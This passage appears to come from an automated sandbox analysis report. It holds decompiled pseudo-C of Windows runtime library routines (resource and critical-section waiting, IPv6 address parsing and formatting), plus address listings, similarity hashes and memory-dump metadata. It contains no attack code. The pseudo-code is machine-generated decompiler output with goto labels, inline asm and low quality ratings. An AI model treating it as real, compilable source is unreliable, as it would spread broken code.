							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0099217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00935384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00935329(_t74, _t92);
													_push(1);
													_t48 = E009353A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x009353ab
0x009353ae
0x009353b1
0x009353b4
0x009353b7
0x009505b6
0x009505c0
0x009505c3
0x00000000
0x009505c9
0x009505c9
0x009505cc
0x009505d5
0x009505d5
0x009353bd
0x009353bd
0x009353bd
0x009353be
0x009353be
0x009353be
0x009353c0
0x00000000
0x00000000
0x00972269
0x0097226d
0x00972349
0x0097234d
0x00972273
0x00972276
0x00972279
0x0097227e
0x00972283
0x00972287
0x0097228a
0x0097228d
0x0097228f
0x009722bc
0x009722bc
0x009722bc
0x009722be
0x009722c4
0x009722cc
0x009722d0
0x009722d6
0x009722d7
0x009722da
0x009722df
0x009722e4
0x00000000
0x00000000
0x009722e6
0x009722e9
0x009722f4
0x009722f9
0x009722fa
0x00972305
0x00972314
0x00972319
0x0097231a
0x0097231d
0x00972320
0x00972323
0x00972323
0x00972328
0x0097232d
0x0097232f
0x00972331
0x00972336
0x00972336
0x0097233b
0x0097233d
0x00972350
0x00972351
0x00972356
0x00972359
0x00972359
0x0097235b
0x0097235d
0x00935367
0x0093536b
0x00935372
0x00000000
0x00000000
0x00000000
0x00000000
0x00972363
0x00972363
0x00972369
0x0097236a
0x0097236c
0x00972371
0x00972373
0x00000000
0x00972379
0x00972379
0x0097237a
0x0097237f
0x0097237f
0x00972385
0x00972386
0x00972389
0x0097238e
0x00972390
0x00935378
0x0093537c
0x00972396
0x00972396
0x00972397
0x0097239c
0x009723a2
0x009723a3
0x009723a6
0x009723ab
0x009723ad
0x00000000
0x009723b3
0x009723b3
0x009723b4
0x009723b9
0x009723ba
0x009723ba
0x009723bc
0x009723bf
0x00000000
0x00000000
0x00969153
0x00969158
0x0096915a
0x0096915e
0x00969160
0x00000000
0x00969166
0x00969166
0x00969171
0x00969176
0x00969176
0x00000000
0x00969160
0x009723c6
0x009723cb
0x009723ce
0x009723d7
0x009723d7
0x009723ad
0x00972390
0x00972373
0x0097233f
0x0097233f
0x00000000
0x0097233f
0x00972291
0x00972291
0x00972293
0x00972295
0x0097229a
0x009722a1
0x009722a3
0x009722a7
0x009722a9
0x00000000
0x00000000
0x009722ab
0x009722ad
0x009722af
0x00000000
0x00000000
0x00000000
0x009722af
0x009722b1
0x009722b4
0x009722b4
0x009722b6
0x00000000
0x00000000
0x00000000
0x00000000
0x009722b6
0x0097228f
0x00000000
0x0097226d
0x009353cb
0x009353ce
0x009353d0
0x009353d4
0x009353d6
0x00000000
0x009353d8
0x009353e3
0x009353ea
0x009353ea
0x009353d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
RTL: Resource at %p, xrefs: 0097230B
RTL: Re-Waiting, xrefs: 00972328

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0093EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0093EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0092DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009116C0(_t39);
				} else {
					_t40 = E0090F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00953915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9f793c; // 0x0
								_push(_t85);
								_t44 = E00911F28(_t71);
							} else {
								_t44 = E0090F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00953915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00992306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0093EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00954FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00963F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00963F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9f20c0;
								if(_t85 != 0x9f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0099217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00963F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0093ec56
0x0093ec56
0x0093ec56
0x0093ec5c
0x0093ec64
0x009723e6
0x009723eb
0x009723eb
0x0093ec6a
0x0093ec6c
0x0093ec6f
0x009723f3
0x009723f8
0x009723fa
0x009723fc
0x0093ec75
0x0093ec76
0x0093ec76
0x0093ec7b
0x0093ec7c
0x0093ec7e
0x00972406
0x00972407
0x0097240c
0x0097240d
0x0097240d
0x0097240d
0x00972414
0x00972417
0x0097241e
0x00972435
0x00972438
0x0097243c
0x0097243f
0x00972442
0x00972443
0x00972446
0x00972449
0x00972453
0x00972455
0x0097245b
0x0097245b
0x0093eb99
0x0093eb99
0x0093eb9c
0x0093eb9d
0x0093eb9f
0x0093eba2
0x00972465
0x0097246b
0x0097246d
0x0093eba8
0x0093eba9
0x0093eba9
0x0093ebae
0x0093ebb3
0x0093ebb9
0x0093ebbb
0x00972513
0x00972514
0x00972519
0x0097251b
0x0093ec2a
0x0093ec2d
0x0093ec33
0x0093ec36
0x0093ec3a
0x0093ec3e
0x0093ec40
0x0093ec47
0x0093ec47
0x0093ec40
0x009122c6
0x0093ebc1
0x0093ebc1
0x0093ebc5
0x0093ec9a
0x0093ec9a
0x0093ebd6
0x0093ebd6
0x00000000
0x0093ebbb
0x00972477
0x0097247c
0x00972486
0x0097248b
0x00972496
0x0097249b
0x0097249d
0x009724a0
0x009724a3
0x009724aa
0x009724aa
0x009724a5
0x009724a5
0x009724a5
0x009724ac
0x009724af
0x009724b0
0x009724b3
0x009724b9
0x009724ba
0x009724bb
0x009724c6
0x009724cb
0x009724cd
0x009724d0
0x009724d1
0x009724d4
0x009724d6
0x009724d9
0x009724d9
0x009724dc
0x009724df
0x009724e1
0x009724e7
0x009724e9
0x009724ec
0x009724ef
0x009724f2
0x009724f2
0x009724ef
0x009724e7
0x009724fa
0x009724ff
0x00972501
0x00972503
0x00972506
0x0097250b
0x0093eb8c
0x0093eb93
0x00000000
0x00000000
0x0093eb93
0x00000000
0x0093eb99
0x0093ec85
0x0093ec85
0x0093ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 009724FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60

Uniqueness

Uniqueness Score: -1.00%

Function 0094FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0094FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0094EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0094EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0094685D(_t167, 4) == 0) {
								if(E0094685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0094685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0094685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00928980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0091DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0094EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0094EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0094fcd1
0x0094fcd6
0x0094fcd9
0x0094fcdc
0x0094fcdf
0x0094fce2
0x0094fce5
0x0094fce8
0x0094fceb
0x0094fced
0x0094fced
0x0094fcf3
0x00000000
0x00000000
0x0094fcfc
0x0094fcfe
0x0094fdc1
0x0097ecbd
0x00000000
0x0097eccc
0x0097eccc
0x0097ecd2
0x00000000
0x00000000
0x0097ecdf
0x0097ece0
0x0097ece4
0x0097eceb
0x0097ecee
0x0097eca8
0x0097eca8
0x0097ecaa
0x0094fd76
0x0094fd79
0x0094fdb4
0x0094fdb5
0x0094fdb6
0x00000000
0x0094fdb6
0x0094fd7e
0x0097ecfc
0x0094fe2f
0x00000000
0x0094fe2f
0x0097ed08
0x0097ed0f
0x0097ed17
0x0097ed1b
0x00000000
0x0097ed1b
0x0094fd88
0x00000000
0x00000000
0x0094fd94
0x0094fd99
0x0094fda1
0x00000000
0x00000000
0x0094fdb0
0x00000000
0x0094fdb0
0x0097ecbd
0x0094fdc7
0x0094fdcb
0x00000000
0x0094fdd7
0x0094fde3
0x0094fe06
0x00961fe7
0x00000000
0x00000000
0x00961fef
0x00961ff0
0x00961ff4
0x00961ff7
0x00961ffa
0x00961ffd
0x00962000
0x00000000
0x00000000
0x0097ecf1
0x00000000
0x0097ecf1
0x00000000
0x0094fe06
0x0094fde8
0x0094fdec
0x0094fdef
0x0094fdf2
0x00000000
0x0094fdf2
0x0094fdcb
0x0094fd04
0x0094fd05
0x0097ec67
0x00000000
0x00000000
0x0097ec6f
0x00000000
0x0097ec6f
0x0094fd13
0x0094fd3c
0x0094fd40
0x0097ec75
0x0097ec7a
0x00000000
0x0097ec8a
0x0097ec8a
0x0097ec90
0x0097ecb2
0x0094fd73
0x0094fd73
0x00000000
0x0094fd73
0x0097ec95
0x00000000
0x00000000
0x0097eca1
0x0097eca4
0x0097eca5
0x00000000
0x0097eca5
0x0097ec7a
0x0094fd4a
0x00000000
0x0094fd6e
0x0094fd6e
0x0094fd71
0x00000000
0x0094fd71
0x0094fd4a
0x0094fd21
0x0095a3a1
0x00000000
0x0095a3a1
0x0094fd36
0x0096200b
0x00962012
0x00000000
0x00000000
0x00962018
0x00000000
0x00962018
0x00000000
0x0094fd36
0x0094fe0f
0x0094fe16
0x0095a3ad
0x00000000
0x00000000
0x0095a3b3
0x0095a3b3
0x0094fe1f
0x0097ed25
0x0097ed86
0x00000000
0x00000000
0x0097ed91
0x0097ed95
0x0097ed95
0x0097ed9a
0x0097edad
0x0097edb3
0x0097edba
0x0097edc4
0x0097edc9
0x00000000
0x0097edcc
0x0097ed2a
0x0097ed55
0x00000000
0x00000000
0x0097ed61
0x0097ed66
0x0097ed6e
0x00000000
0x00000000
0x0097ed7d
0x00000000
0x0097ed7d
0x0097ed30
0x00000000
0x00000000
0x0097ed3c
0x0097ed43
0x0097ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0094FD94

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0094FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0094FE4F(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t18;
				signed int _t26;
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr _t39;
				void* _t40;
				signed int _t43;
				void* _t44;

				_t37 = __edx;
				_t15 =  *0x9f2088; // 0x7750376d
				_v8 = _t15 ^ _t43;
				_t17 = _a4;
				_t31 = _a12;
				_t38 = _a16;
				if(_a4 == 0 || _t38 == 0) {
					L7:
					_t18 = 0xc000000d;
				} else {
					if(_t31 == 0) {
						if( *_t38 == _t31) {
							goto L3;
						} else {
							goto L7;
						}
					} else {
						L3:
						_t40 = E0094FED6(_t17,  &_v52);
						if(_a8 != 0) {
							_t26 = E00947707(_t40,  &_v8 - _t40 >> 1, L":%u", _a8 & 0x0000ffff);
							_t44 = _t44 + 0x10;
							_t40 = _t40 + _t26 * 2;
						}
						_t39 = (_t40 -  &_v52 >> 1) + 1;
						if( *_t38 < _t39) {
							 *_t38 = _t39;
							goto L7;
						} else {
							E00912340(_t31,  &_v52, _t39 + _t39);
							 *_t38 = _t39;
							_t18 = 0;
						}
					}
				}
				return E0091E1B4(_t18, _t31, _v8 ^ _t43, _t37, _t38, _t39);
			}

0x0094fe4f
0x0094fe57
0x0094fe5e
0x0094fe61
0x0094fe65
0x0094fe6a
0x0094fe6f
0x0094feca
0x0094feca
0x0094fe75
0x0094fe77
0x0097ea62
0x00000000
0x0097ea68
0x00000000
0x0097ea68
0x0094fe7d
0x0094fe7d
0x0094fe8c
0x0094fe8e
0x0097ea87
0x0097ea8c
0x0097ea8f
0x0097ea8f
0x0094fe9b
0x0094fe9e
0x0097ea97
0x00000000
0x0094fea4
0x0094fead
0x0094feb5
0x0094feb7
0x0094feb7
0x0094fe9e
0x0094fe77
0x0094fec7

APIs

Part of subcall function 0094FED6: ___swprintf_l.LIBCMT ref: 0094FEFD

___swprintf_l.LIBCMT ref: 0097EA87

Strings

m7Pw, xrefs: 0094FE57
:%u, xrefs: 0097EA7E

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u$m7Pw
API String ID: 48624451-532084305
Opcode ID: dcfadd30455a37676b6ae2c583e653cdffdddf96fc7ec79294ae0e54a0384bc2
Instruction ID: b284375dc5b915d640672592f787d4e88e6034195504105c73dd1040fed6f263
Opcode Fuzzy Hash: dcfadd30455a37676b6ae2c583e653cdffdddf96fc7ec79294ae0e54a0384bc2
Instruction Fuzzy Hash: B111B17260021AEBCB10EFA8C860DFFB7ACEB54701B54482AF805C3142EB34E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ipconfig.exe PID: 3040 Parent PID: 1388 ipconfig.exeCOMMON

Executed Functions

Function 005167C7, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 487nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0051691F

Strings

0, xrefs: 005169A7

Memory Dump Source

